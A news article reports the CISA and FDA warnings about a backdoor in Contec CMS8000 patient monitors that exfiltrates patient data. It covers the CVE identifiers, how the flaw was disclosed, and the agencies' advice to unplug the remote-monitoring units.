Federal agencies are warning hospitals of a backdoor discovered in a
  popular line of patient monitors sold by Chinese company Contec.

  The Cybersecurity and Infrastructure Security Agency (CISA) and Food
  and Drug Administration (FDA) released warnings on Thursday about an
  embedded function they found in the firmware of the Contec CMS8000 —
  hardware used to display information like vital signs, temperature,
  heartbeat and blood pressure.

  Contec Medical is a medical device company based in Hebei, China. The
  affected patient monitors are “used in medical settings in the U.S. and
  European Union,” CISA [1]said.

  The backdoor “may allow remote code execution and device modification
  with the ability to alter its configuration, introducing risk to
  patient safety as a malfunctioning patient monitor could lead to an
  improper response to patient vital signs.”

  CISA noted that the Contec CMS8000 may be re-labeled and sold by
  resellers, with the FDA explaining that Epsimed MN-120 patient monitors
  are also Contec CMS8000 devices inside.

  The FDA [2]said in a statement that the monitors “may be remotely
  controlled by an unauthorized user or not work as intended.” CISA
  [3]tagged the vulnerabilities as CVE-2024-12248, CVE-2025-0626 and
  CVE-2025-0683.

  The FDA said it has not seen any cybersecurity incidents, injuries or
  deaths that related to the vulnerabilities but warned that the bugs
  would allow hackers to bypass security controls and manipulate devices.

  Contec did not respond to requests for comment. There is no software
  patch to address the issues discovered by the two agencies.

  “The FDA and CISA continue to work with Contec to correct these
  vulnerabilities as soon as possible.”

Internet activity

  The software on the monitors “includes a backdoor, which may mean that
  the device or the network to which the device has been connected may
  have been or could be compromised,” the FDA said.

  “Once the patient monitor is connected to the internet, it begins
  gathering patient data, including personally identifiable information
  (PII) and protected health information (PHI), and exfiltrating
  (withdrawing) the data outside of the health care delivery
  environment.”

  CISA said the IP address connected to the backdoor is “not associated
  with a medical device manufacturer or medical facility but a
  third-party university.”

  The agency did not name the university or its location. CISA and the
  FDA did not respond to requests for comment about the university.

  Patients and healthcare providers should ask healthcare facilities if
  their devices have remote monitoring features, which allow hospital
  officials to look at patient vital signals from another location, the
  agencies said.

  If it is confirmed that a device allows remote monitoring, “unplug the
  device and stop using it,” the FDA warned. Patients should ask for an
  alternative patient monitor.

  The agency urged hospital staff to use only local monitoring features,
  which would allow them to unplug the device’s ethernet cable and
  disable wireless capabilities.

  “The FDA has authorized these patient monitors only for wired
  functionality (that is, ethernet connectivity). However, the FDA is
  aware that some patient monitors may be available with wireless (that
  is, WiFi or cellular) capabilities without FDA authorization,” the
  agency noted.

Disclosed by a researcher

  In a longer [4]technical report about the issues, CISA said an external
  researcher notified the agency of the issues through its Coordinated
  Vulnerability Disclosure Process. CISA then tested the findings and
  “discovered what resembles a reverse backdoor within all three of the
  firmware packages.”

  While some companies enable this kind of functionality for updates,
  CISA said it is unlikely this is the case for the backdoors discovered.
  They found that the functionality exhibited “highly unusual
  characteristics that do not support the implementation of a traditional
  update feature.”

  “When the function is executed, files on the device are forcibly
  overwritten, preventing the end customer — such as a hospital — from
  maintaining awareness of what software is running on the device,” CISA
  said.

  “These types of actions and the lack of critical log/auditing data go
  against generally accepted practices and ignore essential components
  for properly managed system updates, especially for medical devices.”

  Get more insights with the

  Recorded Future

  Intelligence Cloud.

  [5]Learn more.

  No previous article

  No new articles

  [6]Jonathan Greig
  [7]

  Jonathan Greig

  is a Breaking News Reporter at Recorded Future News. Jonathan has
  worked across the globe as a journalist since 2014. Before moving back
  to New York City, he worked for news outlets in South Africa, Jordan
  and Cambodia. He previously covered cybersecurity at ZDNet and
  TechRepublic.

References

  1. https://www.cisa.gov/resources-tools/resources/contec-cms8000-contains-backdoor
  2. https://www.fda.gov/medical-devices/safety-communications/cybersecurity-vulnerabilities-certain-patient-monitors-contec-and-epsimed-fda-safety-communication
  3. https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-030-01
  4. https://www.cisa.gov/sites/default/files/2025-01/fact-sheet-contec-cms8000-contains-a-backdoor-508c.pdf
  5. https://www.recordedfuture.com/platform?mtm_campaign=ad-unit-record
  6. https://therecord.media/author/jonathan-greig
  7. https://therecord.media/author/jonathan-greig

You are viewing proxied material from 1436.ninja. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.